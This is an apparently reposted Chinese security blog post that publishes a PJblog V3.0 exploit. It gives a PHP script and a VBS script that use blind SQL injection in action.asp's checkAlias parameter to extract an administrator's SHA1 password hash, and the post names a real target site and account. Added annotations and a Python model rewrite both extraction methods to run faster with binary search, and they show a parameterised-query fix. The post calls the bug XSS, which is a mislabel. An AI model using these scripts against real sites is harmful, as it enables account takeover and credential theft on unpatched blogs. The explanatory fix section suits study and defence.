Yesterday I patched this vulnerability on my own blog, and the friends around me have since patched theirs too, so I am now posting the vulnerable file and the exploit code for this XSS vulnerability. It can dump the administrator's SHA1 password hash; whether you manage to crack that hash is up to your luck.
Vulnerable file: action.asp
Line 14 (the post calls this an XSS bug, but what follows is a blind SQL injection: strcname is taken from the cname request parameter and concatenated straight into the query, and the checkAlias response reveals whether the query matched a row):

set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")

In VBScript a doubled "" inside a string literal is one literal double quote, so the SQL that actually runs is select * from blog_Content where log_cname="<cname>". A " inside cname closes the literal and the rest of the value is parsed as SQL; the exploits below use that to append a boolean condition and read the answer from the page.
PHP exploit code:

<?php
/*
PJblog V3.0 0day exp
code by 小蟑螂&bink
www.0kee.com www.t00ls.net
09.04.22
*/
// Not in the listing as posted: the opening tag and session_start() are required,
// because progress is kept in $_SESSION across the page reloads below.
session_start();
$url="http://www.pjhome.net"; // injection target
$var_name="puterjam"; // administrator account
$var_key="check_right"; // checkAlias prints this when the query matched no row
if ($_SESSION["LenI"]){
    $LenI=$_SESSION["LenI"];
}else{
    $LenI=1;
}
// $i walks the 40 hex characters of the SHA1 hash
for($i=$LenI;$i<=40;$i++){
    if($_SESSION["LenDo"]){
        $StaAsc=$_SESSION["LenDo"];
    }else{
        $StaAsc=31;
    }
    echo "Scan password len:".$i." ;asc from ".$StaAsc." to 127";
    // linear scan: asc(mid(mem_password,$i,1))>$j holds until $j reaches the character code
    for($j=$StaAsc;$j<=127;$j++){
        // the payload follows an alias that exists on the target and is joined with "and",
        // so a false condition returns no row and the page answers check_right
        $newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';
        $var_pagelen=file_get_contents($newurl);
        $var_newpagelen=strpos($var_pagelen,$var_key);
        if($var_newpagelen !== false){
            // first $j for which the condition is false, i.e. $j is the character code
            $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j);
            unset($_SESSION["LenDo"]);
            $_SESSION["LenI"]=$i+1;
            doReload();
            break;
        }
        // reload after 10 requests to stay under PHP's execution time limit;
        // the posted listing never stored $j here, so every reload restarted at 31
        if($j == $StaAsc+10){
            $_SESSION["LenDo"]=$j+1;
            doReload();
            break;
        }
    }
}
// reached once every position has been resolved (the posted listing tested ==40,
// which never matches because LenI is already 41 by then)
if ($_SESSION["LenI"]>40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }
function doReload(){
?>
<script language="javascript">
<!--
window.setTimeout('location.reload()',1000);
//-->
</script>
<?php
    exit; // stop here so the reloaded request, not this one, continues the scan
}
?>
If you have no PHP available, there is also a VBS exploit:

' PJblog V3.0 checkAlias blind injection, VBS version
If WScript.Arguments.Count < 2 Then   ' this line is missing from the listing as posted
    WScript.Echo "Usage: Cscript.exe Exp.vbs <target site URL> <user name to test>"
    WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
    WScript.Quit
End If
attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
    attackUrl = attackUrl & "/"
End If
' upper-case hex plus "J", a sentinel that sorts after "F" so the inner loop always stops;
' Jet compares text case-insensitively, so this also matches a lower-case stored hash
SHA1Charset = "0123456789ABCDEFJ"
strResult = ""
' "0kee" is assumed not to be an existing alias; the trailing quote closes the SQL string literal
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""
' detection: the alias does not exist, so a row can only come back if the injected "or" is evaluated
If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
    WScript.Echo "Congratulations, the target is vulnerable"
Else
    WScript.Echo "Vulnerability not detected"
    WScript.Quit
End If
' extend the known prefix one hex digit at a time: mem_password >= prefix & c stays true up to
' the real digit and turns false at the first larger one, so the previous c is the answer
For n=1 To 40
    For i=1 To 17
        strInject = strHoleUrl & " or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
        If Not IsSuccess(strInject) Then
            strResult = strResult & Mid(SHA1Charset, i-1, 1)
            Exit For
        End If
        strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
        WScript.StdOut.Write strPrint
    Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"
' fetches a URL with GET (despite the name) and returns the body as a string
Function PostData(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET",PostUrl,False
        .Send
        PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData = bytes2BSTR(PostData)
End Function
' converts the raw response bytes to a VBScript string (single-byte and double-byte characters)
Function bytes2BSTR(vIn)
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, I + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            I = I + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function
' True when the page reports the alias as taken ("check_error"), i.e. the query returned a row
Function IsSuccess(PostUrl)
    strData = PostData(PostUrl)
    'Wscript.Echo strData
    If InStr(strData,"check_error") > 0 Then
        IsSuccess = True
    Else
        IsSuccess = False
    End If
    'Wscript.Sleep 500 'give the target a short rest between requests
End Function
How to run the VBS script:
Cscript.exe Exp.vbs <target site URL> <user name to test>
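Added example, not code from the original post or from PJBlog: a self-contained Python model of the checkAlias oracle from action.asp line 14 and of both extraction strategies above, the PHP one (asc(mid(mem_password,i,1)) > j behind a known alias joined with and) and the VBS one (mem_password >= prefix behind a non-existent alias joined with or), each done with a binary search instead of the linear scans in the exploits, next to the parameterised query that closes the hole. It runs against an in-memory SQLite database, so the following are assumptions of the example rather than facts from the page: SQLite quotes strings with ' where Jet uses " (so the payloads swap the quote character), Jet's asc() and mid() are registered as SQLite functions, "top 1" is dropped because SQLite has no TOP, the stored hash is upper-case hex, and the sample rows (alias hello_world, member puterjam with the SHA1 of a made-up password) are constructed for the demo.

```python
"""Model of the PJBlog checkAlias blind-injection oracle (example code, not PJBlog's).

Assumptions (not from the page): SQLite instead of Jet, so ' quotes strings and
"top 1" is omitted; asc()/mid() are registered to mimic Jet; the hash is stored
as upper-case hex; all rows below are constructed sample data.
"""
import hashlib
import sqlite3

CHARSET = "0123456789ABCDEF"                                  # VBS SHA1Charset without the "J" sentinel
SAMPLE_HASH = hashlib.sha1(b"hunter2").hexdigest().upper()    # constructed member password hash


def build_db():
    db = sqlite3.connect(":memory:")
    db.create_function("asc", 1, lambda s: ord(s[0]) if s else 0)                    # Jet Asc()
    db.create_function("mid", 3, lambda s, start, n: s[start - 1:start - 1 + n])     # Jet Mid(), 1-based
    db.executescript("""
        create table blog_Content(log_cname text);
        create table blog_member(mem_name text, mem_password text);
        insert into blog_Content values ('hello_world');
    """)
    db.execute("insert into blog_member values (?, ?)", ("puterjam", SAMPLE_HASH))
    return db


def check_alias_vulnerable(db, strcname):
    """Models action.asp line 14: the alias is spliced straight into the SQL text."""
    sql = "select * from blog_Content where log_cname='" + strcname + "'"
    return "check_error" if db.execute(sql).fetchall() else "check_right"


def check_alias_fixed(db, strcname):
    """Parameterised form: the alias is data and can never change the query structure."""
    sql = "select * from blog_Content where log_cname=?"
    return "check_error" if db.execute(sql, (strcname,)).fetchall() else "check_right"


def is_vulnerable(db):
    """The VBS detection test: a non-existent alias matches with 'or' but not with 'and'."""
    return (check_alias_vulnerable(db, "0kee' or '1'='1") == "check_error"
            and check_alias_vulnerable(db, "0kee' and '1'='2") == "check_right")


def extract_by_charcode(db, user, length=40):
    """PHP-exploit strategy, asc(mid(mem_password,i,1)) > j, with a binary search over
    0..127 (7 requests per character) instead of the linear scan. Like the PHP code it
    needs an alias that exists ('hello_world' here) because it injects with 'and'."""
    def oracle(i, j):
        payload = ("hello_world' and (select asc(mid(mem_password,%d,1)) from blog_member "
                   "where mem_name='%s')>%d and '1'='1" % (i, user, j))
        return check_alias_vulnerable(db, payload) == "check_error"
    out = []
    for i in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:                      # invariant: the code point lies in [lo, hi]
            m = (lo + hi) // 2
            if oracle(i, m):                # code > m, so it is in (m, hi]
                lo = m + 1
            else:
                hi = m
        out.append(chr(lo))
    return "".join(out)


def extract_by_prefix(db, user, length=40):
    """VBS-exploit strategy, mem_password >= prefix + c, injected with 'or' after a
    non-existent alias so no known alias is needed. A binary search over CHARSET
    (4 requests per character) finds the largest c that still satisfies >=."""
    def oracle(prefix):
        payload = ("0kee' or 0<(select count(*) from blog_member where mem_name='%s' "
                   "and mem_password>='%s') and '1'='1" % (user, prefix))
        return check_alias_vulnerable(db, payload) == "check_error"
    prefix = ""
    for _ in range(length):
        lo, hi = 0, len(CHARSET) - 1
        while lo < hi:                      # invariant: the next digit's index lies in [lo, hi]
            m = (lo + hi + 1) // 2
            if oracle(prefix + CHARSET[m]):
                lo = m
            else:
                hi = m - 1
        prefix += CHARSET[lo]
    return prefix


if __name__ == "__main__":
    db = build_db()
    print("vulnerable :", is_vulnerable(db))
    print("charcode   :", extract_by_charcode(db, "puterjam"))
    print("prefix     :", extract_by_prefix(db, "puterjam"))
    print("fixed form :", check_alias_fixed(db, "0kee' or '1'='1"))
```

Running it prints the sample hash twice, once per strategy. The binary search costs 7 requests per character for the code-point oracle and 4 for the 16-symbol hex alphabet, against up to 97 and 17 for the linear scans in the two exploits, which matters when every request is a round trip to the target. Against the parameterised check_alias_fixed the same payloads only ask whether an alias literally named like the payload exists, so there is no oracle to read.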
Please respect copyright when reposting. Source: 秋天博客 (Autumn Blog). Permalink: https://www.cfresh.net/web-security/240